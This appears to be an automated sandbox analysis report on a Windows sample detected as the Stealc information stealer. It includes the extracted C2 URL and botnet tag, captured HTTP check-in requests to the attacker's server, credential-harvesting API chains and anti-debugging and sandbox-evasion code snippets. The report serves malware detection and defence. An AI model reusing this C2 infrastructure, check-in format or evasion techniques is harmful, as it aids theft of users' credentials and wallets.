
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542734
MD5: 79ad5f851a1231db208f005432d0cf1c
SHA1: 67776523d7821292da1ced82653558a60b8a7f19
SHA256: ab409dfe5cafaa8a881a844cd26eed91995b9546528e494db3b46f26812824eb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79AD5F851A1231DB208F005432D0CF1C)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (Source | Rule | Description | Author; the Strings column is empty for every row):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7460 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7460 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.f60000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alert:
    Timestamp: 2024-10-26T08:52:26.981236+0200
    SID: 2044243
    Severity: 1
    Classtype: Malware Command and Control Activity Detected
    Source IP: 192.168.2.8
    Source Port: 49705
    Destination IP: 185.215.113.206
    Destination Port: 80
    Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.f60000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: http://185.215.113.206/e2b1563c6670f193.php/ | Virustotal: Detection: 7%
Source: http://185.215.113.206/ | Virustotal: Detection: 14%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00F6C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F69AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00F69AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F67240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00F67240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F69B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00F69B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F78EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00F78EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00F738B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00F74910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00F6DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00F6E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00F74570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00F6ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00F616D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00F6F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F73EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00F73EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00F6BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00F6DE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
    Data Ascii (line breaks restored from the CRLF bytes in Data Raw):
    ------IEBAAFCAFCBKFHJJJKKF
    Content-Disposition: form-data; name="hwid"

    BE3DB636C1012263180025
    ------IEBAAFCAFCBKFHJJJKKF
    Content-Disposition: form-data; name="build"

    puma
    ------IEBAAFCAFCBKFHJJJKKF--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 identical entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F64880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00F64880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
    Data Ascii (line breaks restored from the CRLF bytes in Data Raw):
    ------IEBAAFCAFCBKFHJJJKKF
    Content-Disposition: form-data; name="hwid"

    BE3DB636C1012263180025
    ------IEBAAFCAFCBKFHJJJKKF
    Content-Disposition: form-data; name="build"

    puma
    ------IEBAAFCAFCBKFHJJJKKF--
Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpD
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpX
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/w9
Source: file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206gw0

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 | 0_2_01331970
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130399A | 0_2_0130399A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124C032 | 0_2_0124C032
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01336B9E | 0_2_01336B9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012FB3E1 | 0_2_012FB3E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133BA04 | 0_2_0133BA04
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01232D27 | 0_2_01232D27
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133D505 | 0_2_0133D505
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01239DF1 | 0_2_01239DF1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01334DD2 | 0_2_01334DD2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132FDD7 | 0_2_0132FDD7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DFE05 | 0_2_011DFE05
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00F645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: seldsqgz ZLIB complexity 0.9948511172038198
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F78680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00F78680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F73720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00F73720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\2J4URBJA.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1872384 > 1048576
Source: file.exe | Static PE information: Raw size of seldsqgz is bigger than: 0x100000 < 0x1a2e00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.f60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;seldsqgz:EW;ogrbyegi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;seldsqgz:EW;ogrbyegi:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00F79860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cc620 should be: 0x1d0d5f
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: seldsqgz
Source: file.exe | Static PE information: section name: ogrbyegi
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01275927 push edi; mov dword ptr [esp], ecx | 0_2_012759B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01275927 push edi; mov dword ptr [esp], ebx | 0_2_012759CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013EE93A push 519E7FBEh; mov dword ptr [esp], ebx | 0_2_013EE987
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0160B152 push 0E056C91h; mov dword ptr [esp], ebx | 0_2_0160B196
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013DB106 push ecx; mov dword ptr [esp], 4C78BDB0h | 0_2_013DB160
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137190B push eax; mov dword ptr [esp], edi | 0_2_01371985
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ebp; mov dword ptr [esp], 327CF32Fh | 0_2_01331986
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 0727CF27h; mov dword ptr [esp], eax | 0_2_013319F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push esi; mov dword ptr [esp], 00000546h | 0_2_01331A0C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ecx; mov dword ptr [esp], ebx | 0_2_01331A66
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ebp; mov dword ptr [esp], 76C9290Ch | 0_2_01331AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 441054D6h; mov dword ptr [esp], edi | 0_2_01331AE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 5D3E4D99h; mov dword ptr [esp], eax | 0_2_01331AF9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ebx; mov dword ptr [esp], eax | 0_2_01331B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push edx; mov dword ptr [esp], esi | 0_2_01331BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ecx; mov dword ptr [esp], eax | 0_2_01331BC4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 789EC220h; mov dword ptr [esp], ebx | 0_2_01331CDF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 3A2977BAh; mov dword ptr [esp], ebp | 0_2_01331D37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push edi; mov dword ptr [esp], esi | 0_2_01331D92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 6F0E5E91h; mov dword ptr [esp], ecx | 0_2_01331E3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push esi; mov dword ptr [esp], edi | 0_2_01331E68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push edi; mov dword ptr [esp], edx | 0_2_01331EC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 16683FF2h; mov dword ptr [esp], ecx | 0_2_01331EE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 53B675E6h; mov dword ptr [esp], edi | 0_2_01331EEF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ebp; mov dword ptr [esp], edi | 0_2_01331F32
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push eax; mov dword ptr [esp], ecx | 0_2_01331F48
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 372F0F62h; mov dword ptr [esp], ecx | 0_2_01331F6F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push 7BD30E65h; mov dword ptr [esp], ecx | 0_2_01331FE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ebx; mov dword ptr [esp], ebp | 0_2_01332054
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push edi; mov dword ptr [esp], 04A11B93h | 0_2_01332075
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01331970 push ecx; mov dword ptr [esp], edx | 0_2_013320C8
Source: file.exe | Static PE information: section name: seldsqgz entropy: 7.953063323630895

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00F79860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13264
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11C258D second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007EFD80CCF033h 0x00000013 push dword ptr [ebp+122D02F5h] 0x00000019 pushad 0x0000001a mov edi, dword ptr [ebp+122D2A6Ah] 0x00000020 mov dword ptr [ebp+122D1C3Ah], edx 0x00000026 popad 0x00000027 stc 0x00000028 call dword ptr [ebp+122D21C2h] 0x0000002e pushad 0x0000002f pushad 0x00000030 call 00007EFD80CCF039h 0x00000035 push ecx 0x00000036 pop eax 0x00000037 pop ebx 0x00000038 jmp 00007EFD80CCF030h 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 mov dword ptr [ebp+122D2D08h], edx 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a jmp 00007EFD80CCF036h 0x0000004f mov dword ptr [ebp+122D2B3Eh], eax 0x00000055 jmp 00007EFD80CCF033h 0x0000005a mov esi, 0000003Ch 0x0000005f add dword ptr [ebp+122D2D08h], eax 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 sub dword ptr [ebp+122D2CECh], ebx 0x0000006f lodsw 0x00000071 or dword ptr [ebp+122D3035h], edx 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b sub dword ptr [ebp+122D24D1h], ecx 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 stc 0x00000086 nop 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a jp 00007EFD80CCF026h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11C1D57 second address: 11C1D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11C1D6E second address: 11C1D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007EFD80CCF026h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134259B second address: 13425BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jp 00007EFD80CDE8C8h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007EFD80CDE8C6h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13425BA second address: 13425BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13364BF second address: 13364C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13414F8 second address: 13414FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13414FE second address: 134150C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007EFD80CDE8C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134150C second address: 1341510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1341510 second address: 1341516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
